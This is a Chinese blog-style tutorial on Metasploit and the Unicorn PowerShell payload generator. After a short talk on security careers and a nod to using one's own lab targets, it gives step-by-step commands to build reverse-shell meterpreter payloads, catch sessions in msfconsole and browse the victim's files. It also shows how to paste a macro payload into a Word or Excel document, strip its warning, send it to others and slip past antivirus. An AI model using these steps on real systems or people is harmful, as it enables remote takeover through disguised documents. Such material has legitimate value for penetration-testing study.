zoukankan      html  css  js  c++  java
  • [7期]美少妇(msf)和独角兽(unicorn)

    MSF 全称:metasploit-framework    渗透大杀器,黑客工具排名第一(靠前),尤其在内网中。在校期间大学生先跟本校安全部沟通好,一起实验。

    得不到校方理解与认可的上SRC或者自己搭建靶机。为什么在当今,政府,学校,公司等网络不堪一击,就是因为感觉不到损失嘛,你会买保险?出了很多事情了才知道痛,道理都是一样的。组织要赚钱,而安全呢?安全是在烧钱,买着买来,招聘一个信息安全的人还动不动就上万。不被老板套路,炒掉你换实习生就实属你上辈子修来的福气了。

    开源地址:github.com/rapid7/metasploit-framework

    安全这几年才慢慢浮出水面进入到更多人的视野中。大家不必拿着漏洞强行去怼别人,每个人都有自己的生活圈子,不理解你的专业也实属正常现象。我们不也不清楚,医学,法律吗?你说学校网络一点都不安全的情况,就等于学法律的人在怼我们,大家没有一点法律意识一样。

    摆正心态:得到认可与奖励,实属幸运。得不到认可甚至被质疑也不要丧气,余弦在校期间还没有学安全呢,就得到了知道创宇CEO的青睐,亲自访校邀请他加入。

    Unicorn 独角兽             国外很喜欢用powershell溢出攻击注入shellcode就可以得到权限

    开源地址:https://github.com/trustedsec/unicorn

    git clone https://github.com/trustedsec/unicorn            【使用方法】

    cd unicorn

    python unicorn.py

    python unicorn.py windows/meterpreter/reverse_tcp   192.168.45.128  9999    【反向链接,IP端口自然是自己的机器,输出两个攻击载荷文件】

    msfconsole -r unicorn.rc           

    . powershell_attack.psl          【目标机执行】

    sessions -i             【看监听会话是否反弹的会话】

    sessions -i   1         【进入反弹的会话】

    ls               【查看目标机文件】

    python unicorn.py windows/meterpreter/reverse_tcp   192.168.45.128  9999 macro      【生成宏攻击的反向链接】利用宏,调用powershell的一种攻击载荷。

    可以将生成的宏攻击载荷复制粘贴到word,ecxel里面。删掉尾巴上面的假装报错,实验阶段不要误导自己了。别让它提示任何信息。

    文档发给别人,shell又反弹回来了。因为本身windows就自带,不仅是360,其他的都识别不了。免杀就不多说了  百度   msf 免杀  

    python unicorn.py windows/meterpreter/reverse_tcp   192.168.45.128  9999 hta     

  • 相关阅读:
    [转]Asp.Net MVC EF各版本区别
    web攻击之七:常见CDN回源问题总结
    web攻击之六:DNS攻击原理与防范
    web攻击之四:DOS攻击
    web攻击之五:上传漏洞
    web攻击之三:SQL注入攻击的种类和防范手段
    web攻击之二:CSRF跨站域请求伪造
    TCP洪水攻击(SYN Flood)的诊断和处理
    DDoS攻防战(三):ip黑白名单防火墙frdev的原理与实现
    DDoS攻防战(二):CC攻击工具实现与防御理论--删除
  • 原文地址:https://www.cnblogs.com/sec875/p/10803580.html
Copyright © 2011-2022 走看看